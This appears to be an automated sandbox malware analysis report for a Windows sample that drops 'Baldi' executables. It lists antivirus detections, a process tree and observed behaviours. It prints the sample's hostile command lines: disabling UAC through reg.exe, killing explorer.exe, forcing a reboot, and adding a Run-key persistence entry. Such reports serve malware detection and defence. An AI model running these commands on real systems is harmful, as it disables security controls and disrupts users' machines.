Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	882703
MD5:	e2c4c4dd8c6a357eca164955a8fe040c
SHA1:	f4114815bce62efbc78c79f9a83ccf74a4ea075c
SHA256:	f3efe3b57a0f5cc46963dbd8832ceecd5768117685b4cee684b1235d9e74ebe5
Tags:	exe
Infos:

Detection

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Changes the wallpaper picture

Uses shutdown.exe to shutdown or reboot the system

Yara detected BatToExe compiled binary

Machine Learning detection for sample

Disables the Windows task manager (taskmgr)

Machine Learning detection for dropped file

Disables UAC (registry)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Drops PE files

Potential key logger detected (key state polling based)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

PE file contains more sections than normal

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

file.exe (PID: 3320 cmdline: C:\Users\user\Desktop\file.exe MD5: E2C4C4DD8C6A357ECA164955A8FE040C)

cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c CleanZUpdater.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Baldi.exe (PID: 3156 cmdline: C:\Baldi\Baldi.exe MD5: 515BC425DAA9558E4A12A917E7DFC701)

taskkill.exe (PID: 5436 cmdline: "C:\Windows\System32\taskkill.exe" /f /im explorer.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

DisableUAC.exe (PID: 7140 cmdline: C:\Baldi\DisableUAC.exe MD5: 9AD923E0B582D7520DBD655C36C1CDD5)

conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cmd.exe (PID: 6040 cmdline: C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

reg.exe (PID: 5744 cmdline: reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f MD5: E3DACF0B31841FA02064B4457D44B357)

shutdown.exe (PID: 3816 cmdline: shutdown -r -t 1 -c "BALDI EVIL..." MD5: 7A22F98F0B7BAEEF5FE1965F075A5E95)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.380014233.0000000000470000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.378526790.000001FFF3EF0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379502958.0000016157B60000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.378545012.000001FFF3F00000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000003.378633984.0000016157B70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000004.00000003.379811354.0000000002370000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000004.00000003.379822097.00000000001C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379169390.000001E5CE7B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379654166.0000016157B70000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379112663.000001E5CE4F9000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000009.00000002.378526790.000001FFF3EF4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379112663.000001E5CE4F0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000003.379239394.0000016157B6F000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379709392.0000016157DD0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000007.00000002.379502958.0000016157B6B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
0000000A.00000002.379169390.000001E5CE7B4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
00000004.00000002.380014233.0000000000448000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: DisableUAC.exe PID: 7140	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: cmd.exe PID: 6040	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: reg.exe PID: 5744	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Process Memory Space: shutdown.exe PID: 3816	JoeSecurity_BatToExe	Yara detected BatToExe compiled binary	Joe Security
Click to see the 16 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 72%

Antivirus detection for dropped file

Source: C:\Baldi\Baldi.exe	Avira: detection malicious, Label: TR/BAS.Samca.amdgw
Source: C:\Baldi\kill.exe	Avira: detection malicious, Label: TR/AD.Nekark.sjwrf
Source: C:\Baldi\mbr.exe	Avira: detection malicious, Label: DR/Delphi.Gen

Multi AV Scanner detection for dropped file

Source: C:\Baldi\Baldi.exe	ReversingLabs: Detection: 70%
Source: C:\Baldi\DisableUAC.exe	ReversingLabs: Detection: 20%
Source: C:\Baldi\kill.exe	ReversingLabs: Detection: 75%
Source: C:\Baldi\mbr.exe	ReversingLabs: Detection: 70%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Baldi\kill.exe	Joe Sandbox ML: detected
Source: C:\Baldi\DisableUAC.exe	Joe Sandbox ML: detected

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405D07 FindFirstFileA,FindClose,	0_2_00405D07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405331
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E

Source: Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	String found in binary or memory: <YT: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-A equals www.youtube.com (Youtube)
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E36000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: <YT: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-AExperience Controls LibraryX equals www.youtube.com (Youtube)
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E0A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ~YT: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-Ang equals www.youtube.com (Youtube)

Source: file.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: file.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Baldi.exe, 00000003.00000002.637111077.0000000002EEC000.00000004.00001000.00020000.00000000.sdmp, Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	String found in binary or memory: https://vk.com/endnet
Source: Baldi.exe, 00000003.00000000.371792165.0000000000640000.00000002.00000001.01000000.00000004.sdmp, Baldi.exe.0.dr	String found in binary or memory: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-A
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E36000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-AExperience
Source: Baldi.exe, 00000003.00000002.637111077.0000000002E0A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/channel/UCsKC-cU51wQN_jz-jUrzu-Ang

Source: file.exe, 00000000.00000002.376997062.0000000000528000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Baldi\DisableUAC.exe

Code function: 4_2_000000014000E9BC GetFocus,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetClassNameA,strncmp,SendMessageA,GetKeyState,GetKeyState,GetKeyState,GetPropA,GetPropA,GetWindowThreadProcessId,GetCurrentProcessId,

4_2_000000014000E9BC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00404EE8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404EE8

Spam, unwanted Advertisements and Ransom Demands

Changes the wallpaper picture

Source: C:\Baldi\Baldi.exe

Key value created or modified: HKEY_CURRENT_USER\Control Panel\Desktop Wallpaper C:\Baldi\lol.png

Jump to behavior

System Summary

Uses shutdown.exe to shutdown or reboot the system

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004030FA EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004030FA

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406128	0_2_00406128
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004046F9	0_2_004046F9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004068FF	0_2_004068FF
Source: C:\Baldi\DisableUAC.exe	Code function: 4_3_021A79B8	4_3_021A79B8
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_000000014000A15C	4_2_000000014000A15C
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_0000000140012B80	4_2_0000000140012B80
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_00000001400127C0	4_2_00000001400127C0
Source: C:\Baldi\DisableUAC.exe	Code function: 4_2_000000014000DFD0	4_2_000000014000DFD0

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

Source: Baldi.exe.0.dr

Static PE information: Number of sections : 12 > 10

Source: file.exe

ReversingLabs: Detection: 72%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c CleanZUpdater.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\Baldi.exe C:\Baldi\Baldi.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\DisableUAC.exe C:\Baldi\DisableUAC.exe
Source: C:\Baldi\DisableUAC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Baldi\Baldi.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe
Source: C:\Baldi\DisableUAC.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c CleanZUpdater.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\Baldi.exe C:\Baldi\Baldi.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\DisableUAC.exe C:\Baldi\DisableUAC.exe	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe	Jump to behavior
Source: C:\Baldi\DisableUAC.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd" /c "C:\Users\user\AppData\Local\Temp\FC2B.tmp\FC2C.bat C:\Baldi\DisableUAC.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\nseED18.tmp

Jump to behavior

Source: classification engine

Classification label: mal92.rans.evad.winEXE@19/8@0/0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

0_2_00402020

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004041FC GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004041FC

Source: C:\Baldi\Baldi.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Baldi\Baldi.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6844:120:WilError_01

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c CleanZUpdater.bat

Source: C:\Baldi\Baldi.exe

Window found: window name: TButton

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static file information: File size 4444053 > 1048576

Data Obfuscation

Yara detected BatToExe compiled binary

Source: Yara match	File source: 00000004.00000002.380014233.0000000000470000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.378526790.000001FFF3EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379502958.0000016157B60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.378545012.000001FFF3F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.378633984.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.379811354.0000000002370000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.379822097.00000000001C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379169390.000001E5CE7B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379654166.0000016157B70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379112663.000001E5CE4F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.378526790.000001FFF3EF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379112663.000001E5CE4F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.379239394.0000016157B6F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379709392.0000016157DD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.379502958.0000016157B6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.379169390.000001E5CE7B4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.380014233.0000000000448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DisableUAC.exe PID: 7140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6040, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: reg.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shutdown.exe PID: 3816, type: MEMORYSTR

Source: C:\Baldi\DisableUAC.exe

Code function: 4_2_000000014001BA98 push rax; retf

4_2_000000014001BA99

Source: Baldi.exe.0.dr	Static PE information: section name: .didata
Source: Baldi.exe.0.dr	Static PE information: section name: .debug
Source: DisableUAC.exe.0.dr	Static PE information: section name: .code
Source: kill.exe.0.dr	Static PE information: section name: .code

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405D2E

Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\mbr.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\DisableUAC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\Baldi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Baldi\kill.exe	Jump to dropped file

Source: C:\Baldi\Baldi.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GG.exe			Jump to behavior
Source: C:\Baldi\Baldi.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run GG.exe			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Baldi\DisableUAC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Baldi\mbr.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Baldi\kill.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405D07 FindFirstFileA,FindClose,	0_2_00405D07
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405331
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E

Source: C:\Users\user\Desktop\file.exe

API call chain: ExitProcess graph end node

graph_0-2817

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405D2E

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Baldi\Baldi.exe

Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\Baldi.exe C:\Baldi\Baldi.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Baldi\DisableUAC.exe C:\Baldi\DisableUAC.exe	Jump to behavior
Source: C:\Baldi\Baldi.exe	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\System32\taskkill.exe" /f /im explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\shutdown.exe shutdown -r -t 1 -c "BALDI EVIL..."	Jump to behavior

